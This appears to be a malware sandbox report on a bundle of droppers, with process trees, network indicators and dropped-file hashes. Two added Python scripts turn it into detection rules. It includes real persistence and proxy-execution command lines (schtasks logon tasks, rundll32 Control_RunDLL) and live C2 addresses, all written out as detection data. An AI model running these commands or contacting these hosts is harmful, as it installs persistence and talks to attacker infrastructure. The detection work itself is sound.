C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2405DB814D59F3DF38C11B5F49434232
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\f7873aa.exe
"C:\Users\Admin\AppData\Local\Temp\f7873aa.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 600
C:\Users\Admin\AppData\Local\Temp\f78b1f1.exe
"C:\Users\Admin\AppData\Local\Temp\f78b1f1.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 600
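The process tree above carries three patterns worth a rule rather than a manual read: a scheduled task created with /sc onlogon and /rl highest whose action is an executable under the user's AppData (persistence under attacker-writable paths), rundll32 calling shell32's Control_RunDLL by name and then by ordinal (#44) against the same non-.cpl file (Control_RunDLL hands the argument to LoadLibrary, so the extension is irrelevant), and taskkill /f against a sibling dropper. The following is an added example, not part of the sandbox report or of any of the families it names: it runs those rules over command lines copied from the tree. Rule names, severities and the user-writable-path list are assumptions made for this example.

```python
"""Added example, not part of the sandbox report: rule-based triage of the
process command lines listed above. The rules, severities and the
SAMPLE_CMDLINES list (copied from the process tree) are constructed here
for illustration."""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    detail: str
    cmdline: str


# Command lines copied from the process tree in the report (constructed sample).
SAMPLE_CMDLINES = [
    r'taskkill /im "setup.exe" /f',
    r'C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G',
    r'"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G',
    r""""C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit""",
    r"""schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'""",
    r'"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"',
    r'C:\Windows\syswow64\MsiExec.exe -Embedding 2405DB814D59F3DF38C11B5F49434232',
    r'C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 600',
]

# Directories an unprivileged user can write to (assumed list). A logon task
# whose action lives here is user-controlled persistence, not a vendor install.
USER_WRITABLE = re.compile(r'\\(?:AppData|Users\\Public|ProgramData|Temp)\\', re.I)

SCHTASKS_CREATE = re.compile(r'\bschtasks(?:\.exe)?\b.*?/create\b', re.I)
SCHTASKS_TR = re.compile(r'''/tr\s+(?P<arg>'[^']*'|"[^"]*"|\S+)''', re.I)
SCHTASKS_TN = re.compile(r'/tn\s+(?P<name>"[^"]*"|\S+)', re.I)
# rundll32 + shell32 Control_RunDLL, by name or by ordinal #44. The argument is
# loaded as a DLL whatever its extension, so ".6G" is as good as ".cpl".
RUNDLL32_CPL = re.compile(
    r'rundll32(?:\.exe)?"?\s+"?(?P<dll>[^",\s]*shell32\.dll)"?,'
    r'(?P<entry>Control_RunDLL\w*|#44)\s+(?P<target>.+?)\s*$', re.I)
TASKKILL = re.compile(r'\btaskkill(?:\.exe)?\b', re.I)
TASKKILL_IM = re.compile(r'/im\s+(?P<image>"[^"]*"|\S+)', re.I)


def detect_logon_task_from_user_dir(cmdline):
    """schtasks /create whose /tr action points into a user-writable directory."""
    if not SCHTASKS_CREATE.search(cmdline):
        return None
    tr = SCHTASKS_TR.search(cmdline)
    if not tr:
        return None
    action = tr.group('arg').strip('\'"')
    if not USER_WRITABLE.search(action):
        return None
    tn = SCHTASKS_TN.search(cmdline)
    name = tn.group('name').strip('"') if tn else '?'
    low = cmdline.lower()
    at_logon = '/sc onlogon' in low
    elevated = '/rl highest' in low          # "run with highest privileges"
    severity = 'high' if (at_logon and elevated) else 'medium'
    when = 'at logon' if at_logon else 'on a schedule'
    level = ', highest run level' if elevated else ''
    return Finding('logon_task_user_dir', severity,
                   f'task {name!r} runs {action} {when}{level}', cmdline)


def detect_rundll32_cpl_proxy(cmdline):
    """rundll32 shell32.dll,Control_RunDLL (or ordinal #44) loading an arbitrary file."""
    m = RUNDLL32_CPL.search(cmdline)
    if not m:
        return None
    target = m.group('target').strip('"')
    odd_ext = not target.lower().endswith('.cpl')
    relative = not re.match(r'^[a-z]:\\', target, re.I)
    detail = f'shell32!{m.group("entry")} loads {target}'
    detail += ' (non-.cpl extension)' if odd_ext else ''
    detail += ' (relative path)' if relative else ''
    return Finding('rundll32_cpl_proxy', 'high' if odd_ext else 'medium', detail, cmdline)


def detect_taskkill_force(cmdline):
    """taskkill /f: a dropper killing a sibling installer, or tampering with AV."""
    if not TASKKILL.search(cmdline) or not re.search(r'\s/f\b', cmdline, re.I):
        return None
    m = TASKKILL_IM.search(cmdline)
    image = m.group('image').strip('"') if m else '?'
    return Finding('taskkill_force', 'low', f'forcibly terminated {image}', cmdline)


RULES = (detect_logon_task_from_user_dir, detect_rundll32_cpl_proxy, detect_taskkill_force)


def scan(cmdlines):
    """Apply every rule to every command line; return all findings in order."""
    return [f for line in cmdlines for rule in RULES if (f := rule(line))]


def summarize(findings):
    """Rule name -> number of hits."""
    return dict(Counter(f.rule for f in findings))


if __name__ == '__main__':
    for f in scan(SAMPLE_CMDLINES):
        print(f'[{f.severity}] {f.rule}: {f.detail}')
```

The rules deliberately key on the combination (creation flags plus an action under a user-writable path; Control_RunDLL plus a non-.cpl or relative target) rather than on the bare binary name, because cmd.exe, schtasks.exe and rundll32.exe are all legitimate in the same tree.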
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gcl-page.biz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| RU | 185.215.113.25:80 | 185.215.113.25 | tcp |
| US | 8.8.8.8:53 | auto-repair-solutions.bar | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | onepremiumstore.bar | udp |
| US | 8.8.8.8:53 | premium-s0ftwar3875.bar | udp |
| US | 8.8.8.8:53 | guidereviews.bar | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | mas.to | udp |
| UA | 194.145.227.161:80 | 194.145.227.161 | tcp |
| US | 104.21.11.154:443 | mas.to | tcp |
| US | 8.8.8.8:53 | abgtt.com | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:80 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | paybiz.herokuapp.com | udp |
| US | 54.208.186.182:443 | paybiz.herokuapp.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | ocsp.r2m03.amazontrust.com | udp |
| DE | 13.224.191.223:80 | ocsp.r2m03.amazontrust.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 54.208.186.182:443 | paybiz.herokuapp.com | tcp |
| US | 8.8.8.8:53 | s3.us-central-1.wasabisys.com | udp |
| US | 38.91.42.102:443 | s3.us-central-1.wasabisys.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 95.100.245.144:80 | www.microsoft.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | paybiz.herokuapp.com | udp |
| US | 34.201.81.34:443 | paybiz.herokuapp.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 54.208.186.182:443 | paybiz.herokuapp.com | tcp |
| US | 72.84.118.132:8080 | | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 72.84.118.132:8080 | | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
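Read as a whole, the Network table separates into a few classes: the external-IP lookup (ip-api.com), the repeated hits on iplogger.org and other public services that host payloads or receive beacons (herokuapp.com, raw.githubusercontent.com, wasabisys.com), plain-HTTP connections straight to an IP with no name resolved (185.215.113.25:80, 194.145.227.161:80, 72.84.118.132:8080), DNS queries that never turned into a connection (gcl-page.biz, t.gogamec.com, the .bar domains, sanctam.net), and OS noise such as www.microsoft.com and the certificate endpoints. The script below is an added example, not part of the sandbox report: it parses rows copied from the table, repairs rows whose protocol was shifted into the Domain column, and sorts destinations into those classes. The service lists and the "benign infrastructure" set are assumptions made for this example.

```python
"""Added example, not part of the sandbox report: triage of the Network table.
SAMPLE_NETWORK_TABLE is a subset of rows copied from the report; the service
lists and the column-repair logic are assumptions made here."""
from collections import Counter
from dataclasses import dataclass

# Rows copied from the report's Network table (constructed sample). The
# 72.84.118.132:8080 row reproduces the column shift seen in the report.
SAMPLE_NETWORK_TABLE = """\
| US | 8.8.8.8:53 | gcl-page.biz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| RU | 185.215.113.25:80 | 185.215.113.25 | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | premium-s0ftwar3875.bar | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:80 | iplogger.org | tcp |
| UA | 194.145.227.161:80 | 194.145.227.161 | tcp |
| US | 8.8.8.8:53 | paybiz.herokuapp.com | udp |
| US | 54.208.186.182:443 | paybiz.herokuapp.com | tcp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 72.84.118.132:8080 | tcp | |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 95.100.245.144:80 | www.microsoft.com | tcp |
"""

# Assumed lists. Public services are legitimate; their appearance here is a
# hosting/beacon pattern, not proof of compromise of the service itself.
ABUSED_PUBLIC_SERVICES = ('iplogger.org', 'pastebin.com', 'raw.githubusercontent.com',
                          'github.com', 'herokuapp.com', 'wasabisys.com', 'mas.to')
IP_LOOKUP_SERVICES = ('ip-api.com',)
BENIGN_INFRA = ('www.microsoft.com', 'c.pki.goog', 'amazontrust.com')


@dataclass(frozen=True)
class Flow:
    country: str
    dest_ip: str
    dest_port: int
    domain: str
    proto: str


def parse_network_table(text):
    """Parse '| Country | Destination | Domain | Proto |' rows into Flow records."""
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith('|'):
            continue
        cells = [c.strip() for c in line.strip('|').split('|')]
        if len(cells) != 4 or cells[0] == 'Country':
            continue
        country, dest, domain, proto = cells
        # Rows with no resolved name come out of the report with the protocol
        # shifted into the Domain column; put it back.
        if domain.lower() in ('tcp', 'udp') and not proto:
            domain, proto = '', domain
        ip, _, port = dest.rpartition(':')
        flows.append(Flow(country, ip, int(port), domain, proto.lower()))
    return flows


def _matches(domain, services):
    return any(domain == s or domain.endswith('.' + s) for s in services)


def triage(flows):
    """Sort destinations into the classes an analyst pivots on."""
    dns_names = {f.domain for f in flows if f.proto == 'udp' and f.dest_port == 53}
    tcp = [f for f in flows if f.proto == 'tcp']
    contacted = {f.domain for f in tcp}
    return {
        # Resolved (or attempted) but never connected: dead or sinkholed C2 candidates.
        'dns_only': sorted(dns_names - contacted),
        # Connections with no hostname at all: hard-coded C2 / download hosts.
        'direct_ip': sorted({f.dest_ip for f in tcp if f.domain in ('', f.dest_ip)}),
        'nonstandard_port': sorted({(f.dest_ip, f.dest_port) for f in tcp
                                    if f.dest_port not in (80, 443)}),
        'ip_lookup': sorted({f.domain for f in tcp if _matches(f.domain, IP_LOOKUP_SERVICES)}),
        'abused_services': dict(Counter(f.domain for f in tcp
                                        if _matches(f.domain, ABUSED_PUBLIC_SERVICES))),
        'benign_infra': sorted({f.domain for f in tcp if _matches(f.domain, BENIGN_INFRA)}),
    }


if __name__ == '__main__':
    for key, value in triage(parse_network_table(SAMPLE_NETWORK_TABLE)).items():
        print(f'{key}: {value}')
```

When turning this into block lists, the direct_ip and dns_only sets are the safe candidates; the public services in abused_services should be handled by URL or path, since blocking iplogger.org or raw.githubusercontent.com outright breaks legitimate traffic.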
Files
memory/2556-0-0x000000007403E000-0x000000007403F000-memory.dmp
memory/2556-1-0x0000000000970000-0x00000000010FE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
| MD5 | 93460c75de91c3601b4a47d2b99d8f94 |
| SHA1 | f2e959a3291ef579ae254953e62d098fe4557572 |
| SHA256 | 0fdba84fe8ed2cf97023c544d3f0807dbb12840c8e7d445a3a4f55174d78b5b2 |
| SHA512 | 4370ae1a1fc10c91593839c51d0fbae5c0838692f95e03cac315882b026e70817b238f7fe7d9897049856469b038acc8ccfd73aae1af5775bfef35bde2bf7856 |
\Users\Admin\AppData\Local\Temp\Firstoffer.exe
| MD5 | 568eaf0936546f3a4d478f0c249a68ff |
| SHA1 | 9e1a778d77d10955e7dc5af123c26e839b253838 |
| SHA256 | 623f08634b1a481b993c2c222f9cf1c87332d946ec7ebc6e2a49ea580f3502de |
| SHA512 | ffc5d1b53dbd7deaeded67a78810b9ffe2bf6a08307f79f0430cb9c4abc5df55fe01f35d33ec3d84b51de3e4bfed3e387eddc38198c0eaf34115edfacaaf98a9 |
memory/2524-17-0x000007FEF5E73000-0x000007FEF5E74000-memory.dmp
memory/2524-20-0x000000013F9F0000-0x000000013FA00000-memory.dmp
\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
| MD5 | 72f96cfde8a3c2abd3f38d8da2cfe889 |
| SHA1 | 72bbf2efd229601d52cce10cfd34fa4229520291 |
| SHA256 | 5b1568f481160da68223eeddcc201b3b0d03b9dddc85e4494e92ee6e919ce10d |
| SHA512 | 36e01f7216d9a5140c28350f95e7bffbfdb57d6a9b00b1e3df88587da9fcd772ac64edf021875e284039e21aaefaf7ec3595899cacfc8396933997e19fd734b9 |
memory/3064-27-0x0000000000240000-0x0000000000258000-memory.dmp
memory/3064-30-0x0000000000270000-0x0000000000276000-memory.dmp
\Users\Admin\AppData\Local\Temp\inst001.exe
| MD5 | 23bcdc132d1f2aaf8d248b6a5bd21801 |
| SHA1 | 2153acec77f4a57c621a3e38d523eb6df9b29134 |
| SHA256 | a7cb6d861c75f36c32cb5a304b0d8d84b5bc0bedd7da2eb942e4d67288f7123b |
| SHA512 | d9684eab46e5431bc69b70154bbef7a3126f0719a80792f120a3a436e6f4f23cf1229d4b4293c1aff4202ab748144ce19dbc4c39f74f631e1b6f9336259f02db |
\Users\Admin\AppData\Local\Temp\install.exe
| MD5 | 28fc3ef97675adb779a68c89e098e7ba |
| SHA1 | 4c8e04317d41426963a310230adb77c7c5ad67fd |
| SHA256 | 06fe5043a987831fcb4bb914b6bc939740f363f920d5145f3cd697a300e1c64d |
| SHA512 | 9355b28f9ce31da2afa2b5676b52032b92c5201c09cd506eadf89c9237f6114c13c0e0cac1fa65fff1ca6cf3c4165bbc148f1a13494ab3d59ba90fea354766ec |
memory/1640-39-0x00000000009F0000-0x0000000000AF0000-memory.dmp
\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | 90cfe790d93388738929453e0b8a976e |
| SHA1 | 0b8dd0ae4070259991b0de105ec3390afbb2fb44 |
| SHA256 | 2ded24319d6e74ee1b9ad2517fbfd1ceceeca9b854d34b722481cbc694270831 |
| SHA512 | 2a9b0fd6a3fe152f8cd5cb02703be679918949a9bbc86f90cd4cdb8bd68cee716561a80541a4620a20f034d04eef8e5ec9edae2c1969c45ab1fd03fc616e7162 |
\Users\Admin\AppData\Local\Temp\7.exe
| MD5 | 6a16fdad888507df0b938dd3421cc7cf |
| SHA1 | d60d3a5959349f1df9e83292003e547828535ea3 |
| SHA256 | 1bad2fb46b08904f12a4ea96ce3cf0582f9995c16a26143c16b858702793e166 |
| SHA512 | c6877e5b5b58730e188b441a67099605d2c6ae5dd94b2a0281534771555a09d144f952878e4ade462f33604e96a7f66dab5f18689b72d4ff589952784e1f9e16 |
memory/2868-65-0x00000000009B0000-0x00000000009B8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
| MD5 | f39dd2806d71830979a3110eb9a0ae44 |
| SHA1 | fd94b99664d85eede48ab22f27054ab5cc6dd2d3 |
| SHA256 | c5763dba038b94970b85fd0a078bcb1977e3973c56780e76b443915a9c30e213 |
| SHA512 | ffc5a57fa4982a425e1bb2077affba0113d92365ad6eae849e9d700ee99615128c965de3705d2f2a12c1b46230ef2fc1820e4b74b8a3938b1b7211a228db9e82 |
\Users\Admin\AppData\Local\Temp\setup_2.exe
| MD5 | 662af94a73a6350daea7dcbe5c8dfd38 |
| SHA1 | 7ab3ddd6e3cf8aaa7fa2c4fa7856bb83ea6a442c |
| SHA256 | df0b82e8877857057a9b64b73281099f723ae74b1353cf216ca11ba6b20b3ef8 |
| SHA512 | d864c483bfb74479c90ea38a46fe6cd3d628a8b13bd38acde4ccce3258ec290e5389fe920a4351dadb7fd23f87cd461ecf253c5d926f8277e518a7b5029f583a |
memory/1724-80-0x0000000000400000-0x0000000000414000-memory.dmp
\Users\Admin\AppData\Local\Temp\jhuuee.exe
| MD5 | f9be28007149d38c6ccb7a7ab1fcf7e5 |
| SHA1 | eba6ac68efa579c97da96494cde7ce063579d168 |
| SHA256 | 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914 |
| SHA512 | 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171 |
C:\Users\Admin\AppData\Local\Temp\lijun-game.exe
| MD5 | fce1bf8a528a6f3cd7fbfe8c5360bffb |
| SHA1 | 1d5a8cba2fe37249f08154f4de532f2b2703fbfd |
| SHA256 | 61f6aaf51880570891d51f241af185edfa7ae118b4c4d2ddba4ed12f314db69c |
| SHA512 | a5d559e62289c60348991ff1f8c9663b4e339bf8359bdb2b981824635ee0a475c31c6c5d84d38a9565ec609abe4243d963cccaf435091d1ed55c40498bed990a |
\Users\Admin\AppData\Local\Temp\is-123MS.tmp\setup_2.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe
| MD5 | 3d9122fa1978d737354a61b3b4fc2c1b |
| SHA1 | 955f39ab127baa0c5fd23a1724293b52ce48e10e |
| SHA256 | 90abe563deabe721caffa1a0297eb3e1ab5fdad2a4e8e0dba26764f169062e1e |
| SHA512 | f4f994ac1b5c2c9634fd3da58a1d993154eb2ed573bbc127466b90996970cf245453a9dd2d6ba642fbfae7bc7b7f2e8ff1671c0b7a638bd1a9afb54fb2b42d7a |
\Users\Admin\AppData\Local\Temp\is-N0CCE.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
| MD5 | e4ff121d36dff8e94df4e718ecd84aff |
| SHA1 | b84af5dae944bbf34d289d7616d2fef09dab26b7 |
| SHA256 | 2a019bc6bace686b08286ee7d8e2e66c18283b162d27774c486037c940dc60cc |
| SHA512 | 141f12468cfe737b3694a4ece8f17c5d35bbade05ee0538fe4ef4fccf61584374f79a474fd4bf82685a4840afd94e9a9bbd9c9f357cb342dda9f89109c4da5f4 |
memory/2092-123-0x0000000000E90000-0x0000000000E98000-memory.dmp
memory/1040-138-0x0000000000400000-0x0000000000414000-memory.dmp
\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\decoder.dll
| MD5 | 62326d3ef35667b1533673d2bb1d342c |
| SHA1 | 8100ce90b7cbddd7ef2fd77c544ebf12ebd5ec33 |
| SHA256 | a087b791ff8ff9e05e339600199aa389a4554050acc7af7fa36dbe208be7382e |
| SHA512 | 7321feae8ee8d0653d7bd935e3d2e6f658e6798b2a7a8f44976c58509028e79284582132cb999c7c3124a7e94960d9c5d5fc8edefaeda06275ab725730d0d9b5 |
\Users\Admin\AppData\Local\Temp\is-N0CCE.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/2952-154-0x0000000000400000-0x0000000000878000-memory.dmp
memory/3012-141-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1724-160-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\15211163522206146976
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi
| MD5 | e8814a38767e2058ea73c141708d3944 |
| SHA1 | 8a5cc50e86e64c724a458ef837a59881cf923534 |
| SHA256 | 3b948d673f54a39a50d92b2819ab8d1ad2c54f9c1de368b19fca2c8648661e8d |
| SHA512 | b0d7936840db0f8418a31f938144eb1826ebf6ac01ac358c5f6f607ba7267e6c1549ea46ea607dea825a5e83d2eae20304e29e25976cd66d21e87e7f7990f045 |
C:\Users\Admin\AppData\Local\Temp\CabCD01.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarCE2D.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\Local\Temp\152111635222
| MD5 | fc64e693b8771f963768ae48e078092e |
| SHA1 | 3b77890df36beed5fcd3311817685ee085696ba7 |
| SHA256 | eeb7f0490c8d2f726eb3b4f0303a5573389b7a81d406c2926403c9910145534a |
| SHA512 | 76a12363cae00c5cbc9670ba8b9883125bb54fced6b5e3a2d5b01e2afb036363dc0fa5d749096fd31bd70c2aeedf3d155164534761dd800f9b45a87a6454bb62 |
memory/1928-270-0x00000000023D0000-0x000000000250A000-memory.dmp
memory/1928-321-0x0000000002890000-0x0000000002934000-memory.dmp
memory/1928-328-0x0000000000370000-0x0000000000402000-memory.dmp
memory/1928-325-0x0000000000370000-0x0000000000402000-memory.dmp
memory/2524-332-0x000007FEF5E73000-0x000007FEF5E74000-memory.dmp
memory/1640-331-0x0000000000400000-0x00000000008D7000-memory.dmp
memory/1640-335-0x00000000009F0000-0x0000000000AF0000-memory.dmp
memory/3056-334-0x0000000000400000-0x0000000000877000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MSIEC7D.tmp
| MD5 | 07ce413b1af6342187514871dc112c74 |
| SHA1 | 8008f8bfeae99918b6323a3d1270dea63b3a8394 |
| SHA256 | 0ba7e90fe2a0005e1e0dad53e2678916650c3b95ff9b666b802d128276c8ec46 |
| SHA512 | 27df52bfcbc2d0ce3756a2526e632b5610d7047259b31aeeff12652de3e046bcd239e39c222a323654f475f1f913679b4fdd858303e0e105f7a300b6f6ed0fe5 |
memory/2248-349-0x0000000000400000-0x0000000000878000-memory.dmp
memory/1040-348-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1440-359-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1928-382-0x00000000023D0000-0x000000000250A000-memory.dmp
memory/3056-383-0x0000000000400000-0x0000000000877000-memory.dmp
memory/1640-391-0x00000000009F0000-0x0000000000AF0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\83973314234.exe
| MD5 | 6445250d234e789c0c2afe69f119e326 |
| SHA1 | 03074f75c0ff50783d8c2e32d96e39b746540f66 |
| SHA256 | 2e6cd9433e66a9ebde268bc6949d4660de441790bd39ffc9cb0f4caaeb44320f |
| SHA512 | ecd094a4d026378f85435f8a2dc16c92c033aff92ba126d8bbb22d6b279b842d417f4df0f63199ea248d0ec64b9679acb5a1f835560d8e3c5b84be492cc0e68e |
memory/1928-531-0x0000000000370000-0x0000000000402000-memory.dmp
memory/1928-532-0x0000000002940000-0x0000000003DC2000-memory.dmp
memory/1928-533-0x0000000003DD0000-0x0000000003E5B000-memory.dmp
memory/1928-537-0x0000000003E60000-0x0000000003EE6000-memory.dmp
memory/2124-556-0x0000000002390000-0x00000000024CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1044\background.jpg_1
| MD5 | dad3ad4310bc5bac9792e23d6949fcaa |
| SHA1 | 6dc7a1f5d6db6ef57dc854929110c9fd40ded9d3 |
| SHA256 | 9aff9d1d1319aeaeb1ec627f42d2527dd6e54c14125d6c639ec9739b11795db8 |
| SHA512 | 914deef5ffa1bac71109f81e57ab76b5a1f80d5b6c4b2717302c0d79e8ccc1b09e72a4c397521f7bfa15847aec7ce54038a316512e20637fb1e1c48b387f75d5 |
memory/2524-599-0x00000000005F0000-0x00000000005FE000-memory.dmp
memory/2124-605-0x00000000009E0000-0x0000000000A72000-memory.dmp
memory/2124-602-0x00000000009E0000-0x0000000000A72000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MSI4167.tmp
| MD5 | 842cc23e74711a7b6955e6876c0641ce |
| SHA1 | 3c7f32c373e03d76e9f5d76d2dfdcb6508c7af56 |
| SHA256 | 7e434d53739356b7f74c5143b98138c6b67b38c2dbd772a28e8dde70e8be8644 |
| SHA512 | dd8323f657786fae516b400fe6b0569b8d4d16ccb4b396648b427e875d9e5b1eb7a874338d386f0940dc370de6fecf9893efd28149745bc9fd3f67a792ec824d |
memory/2312-615-0x000000013F3E0000-0x000000013F3F0000-memory.dmp
memory/2124-678-0x0000000002390000-0x00000000024CA000-memory.dmp
memory/2248-681-0x0000000000400000-0x0000000000878000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MSI6954.tmp
| MD5 | f32ac1d425e8b7c320d6be9a968585ab |
| SHA1 | 3b0bd3122226f2ac9f11664d9fc13d699b6dcfa0 |
| SHA256 | 96f8d286f86055dcb3a15e0f3a2de092b0441ec36455c14caaad4c1f5a227894 |
